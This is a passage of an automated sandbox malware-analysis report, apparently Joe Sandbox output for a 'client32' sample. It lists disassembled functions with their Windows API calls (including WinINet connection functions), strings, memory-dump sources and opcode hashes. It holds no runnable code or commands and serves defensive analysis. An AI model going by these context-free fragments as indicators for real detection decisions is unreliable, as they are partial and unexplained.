                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: DATA
                                                                                                                                        • API String ID: 269201875-2607161047
                                                                                                                                        • Opcode ID: 4bcf6e97e69771caef7888f65f0b24bdb1f6317eaf7bde31c7f94695a5ecb7e6
                                                                                                                                        • Instruction ID: be9a7e6234f76fdeef647e772528474a72f3d76b3d57c0a7adfc06b6fdd95687
                                                                                                                                        • Opcode Fuzzy Hash: 4bcf6e97e69771caef7888f65f0b24bdb1f6317eaf7bde31c7f94695a5ecb7e6
                                                                                                                                        • Instruction Fuzzy Hash: E331B1B5D04249ABEB01DBA88D00BBF77F89F95254F8445A8E819E7200F735DB1587E2
                                                                                                                                        Function 688FF3A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FF3B4
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 68911928
                                                                                                                                          • Part of subcall function 68911913: __CxxThrowException@8.LIBCMT ref: 6891193D
                                                                                                                                          • Part of subcall function 68911913: std::exception::exception.LIBCMT ref: 6891194E
                                                                                                                                        • _memmove.LIBCMT ref: 688FF3FB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: string too long
                                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                                        • Opcode ID: a983f20e56155ce31968540275e36e4c4dd754d4c92555a7af223f64330c5e7e
                                                                                                                                        • Instruction ID: 810ff4bc7bb866472a8290dd8a6cfeac2c11144e949662ad824372b795f0758d
                                                                                                                                        • Opcode Fuzzy Hash: a983f20e56155ce31968540275e36e4c4dd754d4c92555a7af223f64330c5e7e
                                                                                                                                        • Instruction Fuzzy Hash: 8911E9725483145FE7209D78A8C0A2EB7A8AF71268F900E3EE593D3581DBA1E446C3A1
                                                                                                                                        Function 68908BD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 4104443479-2766056989
                                                                                                                                        • Opcode ID: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                                        • Instruction ID: 7911b51f72c73a3d98f52021b32edb040068c94db7f2fc77c672dd7179e7c4bb
                                                                                                                                        • Opcode Fuzzy Hash: f9483b5ad1248861c0422d5c3db81375aa2358dc5ca2805fe77c16bdf1cdb177
                                                                                                                                        • Instruction Fuzzy Hash: 6211D3B6640709AFDB18CF58DCC09AB3379EB94314F50492DE9078B202E734EA4AC7A1
                                                                                                                                        Function 688FC890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 688FC8A6
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 68911975
                                                                                                                                          • Part of subcall function 68911960: __CxxThrowException@8.LIBCMT ref: 6891198A
                                                                                                                                          • Part of subcall function 68911960: std::exception::exception.LIBCMT ref: 6891199B
                                                                                                                                        • _memmove.LIBCMT ref: 688FC8DF
                                                                                                                                        Strings
                                                                                                                                        • invalid string position, xrefs: 688FC8A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: invalid string position
                                                                                                                                        • API String ID: 1785806476-1799206989
                                                                                                                                        • Opcode ID: 9bbd5dba0e8c01a182b87c00805eda8442f532fd61a3d28ec87380ac0956a178
                                                                                                                                        • Instruction ID: c02a6a94a48a839cee52fac230809e9b44cc67b0809cd7b1edad181458988808
                                                                                                                                        • Opcode Fuzzy Hash: 9bbd5dba0e8c01a182b87c00805eda8442f532fd61a3d28ec87380ac0956a178
                                                                                                                                        • Instruction Fuzzy Hash: B70104327542289BD330C96CEC8092AB7ABEBC1690BA44D39D491CB702C670ED43C3A1
                                                                                                                                        Function 11019140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 11019155
                                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
                                                                                                                                          • Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
                                                                                                                                          • Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE
                                                                                                                                        • _memmove.LIBCMT ref: 11019184
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                        • String ID: vector<T> too long
                                                                                                                                        • API String ID: 1785806476-3788999226
                                                                                                                                        • Opcode ID: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                        • Instruction ID: 308c0151805cc611b22231fe70dd9f684293cd40c739421a1377831650370b76
                                                                                                                                        • Opcode Fuzzy Hash: 7f318a4f0ee09e05d674ed05e0d225db315ff90e224b0fed7e964b3f692f1594
                                                                                                                                        • Instruction Fuzzy Hash: 6E0192B2E012059FD724CE69DC808A7B7E9EB95314715CA2EE59687704EA70F940CB90
                                                                                                                                        Function 68907AE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                                        • API String ID: 4104443479-2732665889
                                                                                                                                        • Opcode ID: 35c2cd4323831367a16f5b45c18e7868a07a8e35e8313ceeb1b955293a7563e1
                                                                                                                                        • Instruction ID: bd124cba1e5cc1991241b85f7eaa3e611f86ef86b638539126bb1274e1f30e6e
                                                                                                                                        • Opcode Fuzzy Hash: 35c2cd4323831367a16f5b45c18e7868a07a8e35e8313ceeb1b955293a7563e1
                                                                                                                                        • Instruction Fuzzy Hash: 1601D6796042056FD720CE6CDC80D6AB3BDEFD8368B44C92DF949C7205D671F8408BA0
                                                                                                                                        Function 6890BA20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __strdup
                                                                                                                                        • String ID: *this==pszSrc$NSMString.cpp
                                                                                                                                        • API String ID: 838363481-1924475612
                                                                                                                                        • Opcode ID: d9e1b7e8e0f23dc2342f20e2718d72df4a4ad948033143e28e56d1d3ff99e6e3
                                                                                                                                        • Instruction ID: 545633349a883e5d821bac9d04b7c701d9551118b7c80e7e539059df6dca1f41
                                                                                                                                        • Opcode Fuzzy Hash: d9e1b7e8e0f23dc2342f20e2718d72df4a4ad948033143e28e56d1d3ff99e6e3
                                                                                                                                        • Instruction Fuzzy Hash: 6BF028726043245BC7109A9DA805967B7FDCF9536CB84803EE899C7300E670D80586D0
                                                                                                                                        Function 6890C860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                                        • Opcode ID: 79e4e4a952558211e334d2ce5679751ebcb597392141644356bbee2edc293ad9
                                                                                                                                        • Instruction ID: 4ac117edec5f9c1d474a010583834251db26949e2589c30549bb1fc1d268093e
                                                                                                                                        • Opcode Fuzzy Hash: 79e4e4a952558211e334d2ce5679751ebcb597392141644356bbee2edc293ad9
                                                                                                                                        • Instruction Fuzzy Hash: 75F0A475A0411CABDF10EBA8DC00AFEB7B99B85208F80419DEA49A7240DB309E4587A5
                                                                                                                                        Function 688F4C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 688F4C84
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4CBD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetConnectA
                                                                                                                                        • API String ID: 199729137-3259999732
                                                                                                                                        • Opcode ID: 760807a5d0b4fac80ab8c25786a53c6f5b96b8fcbde653851536cb55ae2fdb63
                                                                                                                                        • Instruction ID: 72fa6331bee03e865b654582fce9a24961ff455fb412f3ee0f24062b02e87812
                                                                                                                                        • Opcode Fuzzy Hash: 760807a5d0b4fac80ab8c25786a53c6f5b96b8fcbde653851536cb55ae2fdb63
                                                                                                                                        • Instruction Fuzzy Hash: 49F01472614618AFCB20CF98D884E9BB3E8EB8C750F00861AF90AD3640D630E815CFA0
                                                                                                                                        Function 688F4E20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 688F4E34
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4E6D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: HttpOpenRequestA
                                                                                                                                        • API String ID: 199729137-1149044843
                                                                                                                                        • Opcode ID: afc84183fbc99baaedacb476632ff041f1350ad619276e8355f68b823301e3fe
                                                                                                                                        • Instruction ID: f1cb4b66603c7a3d377cd8437814219c7c2e9a2d4cedb02da7ab3828ead0b61c
                                                                                                                                        • Opcode Fuzzy Hash: afc84183fbc99baaedacb476632ff041f1350ad619276e8355f68b823301e3fe
                                                                                                                                        • Instruction Fuzzy Hash: 37F03772614628AFCB20CF98D884EAB77E9EF8C760F00851AF919D3640D630EC51CBA0
                                                                                                                                        Function 6890C8E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wvsprintf
                                                                                                                                        • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                        • API String ID: 2795597889-2173072673
                                                                                                                                        • Opcode ID: d4c1fb81a09242ac280996233850f88dd3e2b3d1a88fd1e03ade281b0212007e
                                                                                                                                        • Instruction ID: fd224e2bcce88f027946979b3acb74e8988d890bdbd6562b9b080eda9d35a119
                                                                                                                                        • Opcode Fuzzy Hash: d4c1fb81a09242ac280996233850f88dd3e2b3d1a88fd1e03ade281b0212007e
                                                                                                                                        • Instruction Fuzzy Hash: 4EF04475A0411CBBCB10DB98DC40AEEBBA8DF45208F40419DEA59A7140DA70AE4587A5
                                                                                                                                        Function 6891A96A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68913B5E: __getptd.LIBCMT ref: 68913B64
                                                                                                                                          • Part of subcall function 68913B5E: __getptd.LIBCMT ref: 68913B74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A979
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 6891A987
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 803148776-1018135373
                                                                                                                                        • Opcode ID: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
                                                                                                                                        • Instruction ID: b5c99e904d232da115666403782fcc832a905870a85d5e98e1a39781b6da48d3
                                                                                                                                        • Opcode Fuzzy Hash: 2452e7b31edf34142d9f3851a69658c052941af2b49b5eb0351d6327035b76d5
                                                                                                                                        • Instruction Fuzzy Hash: AB014B3880D20CCECB249F25D444BACB7F9AF10219FD1842ED4E166690EB34CDC8EB91
                                                                                                                                        Function 688F4AF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 688F4B04
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 688F4B31
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetOpenA
                                                                                                                                        • API String ID: 199729137-3658917949
                                                                                                                                        • Opcode ID: 090b3c4b84598f9851d8840045fbccf69e436499e702f6f047ecc369b6e1c7b7
                                                                                                                                        • Instruction ID: 94ec98e3181317f18ba2b215ab177a3ebd8ed2ad3a705772ec44345f1edcbd88
                                                                                                                                        • Opcode Fuzzy Hash: 090b3c4b84598f9851d8840045fbccf69e436499e702f6f047ecc369b6e1c7b7
                                                                                                                                        • Instruction Fuzzy Hash: 8EF03072604218AFC720DFA4D844E5B77E8EB88751F00851AF90997601D670E811CFA0
                                                                                                                                        Function 688F4CD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InternetErrorDlg), ref: 688F4CE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,688FB4D8,00000000), ref: 688F4D11
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                        • String ID: InternetErrorDlg
                                                                                                                                        • API String ID: 199729137-3951532234
                                                                                                                                        • Opcode ID: 973480e5dd55af55713767beeb974c636325c968bf9ad50402aaf1e9cd890ff9
                                                                                                                                        • Instruction ID: 2a8c073873fc1abe98c12a0dbb03ac210aca8ac311878a6a3543c369eb2535f2
                                                                                                                                        • Opcode Fuzzy Hash: 973480e5dd55af55713767beeb974c636325c968bf9ad50402aaf1e9cd890ff9
